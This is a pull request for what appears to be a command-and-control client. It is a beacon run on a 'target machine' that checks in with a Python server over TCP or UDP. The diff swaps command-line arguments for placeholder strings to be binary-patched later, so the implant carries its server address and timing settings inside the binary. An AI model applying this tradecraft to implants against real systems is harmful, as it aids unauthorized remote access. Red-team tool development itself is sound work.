### PR TITLE
Patch args later

### DIFF
--- a/TCP/README.md
+++ b/TCP/README.md
@@ -26,9 +26,12 @@ You can compile the debug version of the client with print statements by adding 
 Change the client exe name if desired.
 Move the resultant executable to your target machine, and then run it with the following command:
 
->./[Name].exe [Python Server IP] [Port] [Pipename] [Sleep] [Timeout]
+>./[Name].exe
 
-- [Name] is the name of your client executable.
+Use the binary patcher to patch in arguments <https://github.com/fitzgeralddaniel/binary_patcher>
+
+>python3 bipa.py [input binary] [output binary] -a [Python Server IP] -b [Port] -c [Pipename] -d [Sleep] -e [Timeout]
+
 - [Python Server IP], [Port], and [Pipename] must be the same as the ones passed to server.py.
 - [Sleep] is the sleep time (in seconds) to wait between check ins with the server. It hits this sleep when the beacon indicates it has nothing left to send back to the server and is just checking in.
 - [Timeout] is the send/recv socket timeout option (in seconds) set by setsockopt(). May remove in future.

--- a/TCP/client.c
+++ b/TCP/client.c
@@ -222,10 +222,10 @@ void write_frame(HANDLE my_handle, char * buffer, DWORD length) {
 void main(int argc, char* argv[])
 {
 	// Set connection info
-	if (argc != 6)
+	if (argc != 1)
 	{
 		debug_print("Incorrect number of args: %d\n", argc);
-		debug_print("Incorrect number of args: %s [IP] [PORT] [PIPE_STR] [SLEEP] [TIMEOUT]\n", argv[0]);
+		debug_print("Incorrect number of args: %s\n", argv[0]);
 		exit(1);
 	}
 
@@ -233,17 +233,22 @@ void main(int argc, char* argv[])
 	SetErrorMode(SEM_FAILCRITICALERRORS | SEM_NOGPFAULTERRORBOX);
 	// _set_abort_behavior(0,_WRITE_ABORT_MSG);
 
-	char* IP = argv[1];
-	char* PORT = argv[2];
+	//char* IP = argv[1];
+	char IP[50] = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA";
+	//char* PORT = argv[2];
+	char PORT[50] = "BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB";
 	
-	char pipe_str[50];
-	strncpy(pipe_str, argv[3], sizeof(pipe_str));
+	char pipe_str[50] = "CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC";
+	//strncpy(pipe_str, argv[3], sizeof(pipe_str));
 
 	int sleep;
-	sleep = atoi(argv[4]);
+	//sleep = atoi(argv[4]);
+	sleep = atoi("DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD");
+
 
 	int TIMEOUT_SEC;
-	TIMEOUT_SEC = atoi(argv[5])*1000;
+	//TIMEOUT_SEC = atoi(argv[5])*1000;
+	TIMEOUT_SEC = atoi("EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE")*1000;
 
 	DWORD payloadLen = 0;
 	char* payloadData = NULL;

--- a/UDP/README.md
+++ b/UDP/README.md
@@ -31,9 +31,12 @@ You can compile the debug version of the client with print statements by adding 
 Change the client exe name if desired.
 Move the resultant executable to your target machine, and then run it with the following command:
 
->./[Name].exe [Python Server IP] [Port] [Pipename] [Sleep] [Timeout] [Retries]
+>./[Name].exe
 
-- [Name] is the name of your client executable.
+Use the binary patcher to patch in arguments <https://github.com/fitzgeralddaniel/binary_patcher>
+
+>python3 bipa.py [input binary] [output binary] -a [Python Server IP] -b [Port] -c [Pipename] -d [Sleep] -e [Timeout] -f [Retries]
+
 - [Python Server IP], [Port], and [Pipename] must be the same as the ones passed to server.py.
 - [Sleep] is the sleep time (in seconds) to wait between check ins with the server.
 - [Timeout] is the number of seconds to set the socket timeout to.

--- a/UDP/client.c
+++ b/UDP/client.c
@@ -540,22 +540,27 @@ void main(int argc, char* argv[])
 	SetErrorMode(SEM_FAILCRITICALERRORS | SEM_NOGPFAULTERRORBOX);
 	// _set_abort_behavior(0,_WRITE_ABORT_MSG);
 
-	char* IP = argv[1];
-	char* PORT = argv[2];
+	//char* IP = argv[1];
+	char IP[50] = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA";
+	//char* PORT = argv[2];
+	char PORT[50] = "BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB";
 	my_seqnum = 0;
 	server_seqnum = 0;
 	
-	char pipe_str[50];
-	strncpy(pipe_str, argv[3], sizeof(pipe_str));
+	char pipe_str[50] = "CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC";
+	//strncpy(pipe_str, argv[3], sizeof(pipe_str));
 
 	int sleep;
-	sleep = atoi(argv[4]);
+	//sleep = atoi(argv[4]);
+	sleep = atoi("DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD");
 
 	int TIMEOUT;
-	TIMEOUT = atoi(argv[5])*1000;
+	//TIMEOUT = atoi(argv[5])*1000;
+	TIMEOUT = atoi("EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE")*1000;
 
 	int RETRIES;
-	RETRIES = atoi(argv[6]);
+	//RETRIES = atoi(argv[6]);
+	RETRIES = atoi("FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF");
 
 	DWORD payloadLen = 0;
 	char* payloadData = NULL;

--- a/UDP/client.c
+++ b/UDP/client.c
@@ -529,10 +529,10 @@ void main(int argc, char* argv[])
 //TODO - add argument for IPv4 vs IPv6. TCP allows for protocol-agnostic sockets, UDP does not. 
 {
 	// Set connection info
-	if (argc != 7)
+	if (argc != 1)
 	{
 		debug_print("Incorrect number of args: %d\n", argc);
-		debug_print("Incorrect number of args: %s [SERVER_IP] [PORT] [PIPE_STR] [SLEEP] [TIMEOUT] [RETRIES]", argv[0]);
+		debug_print("Incorrect number of args: %s", argv[0]);
 		exit(0);
 	}
 


### PR DESCRIPTION
Stub out arguments to use binary patcher to patch them in.
This allows you to not need command line args.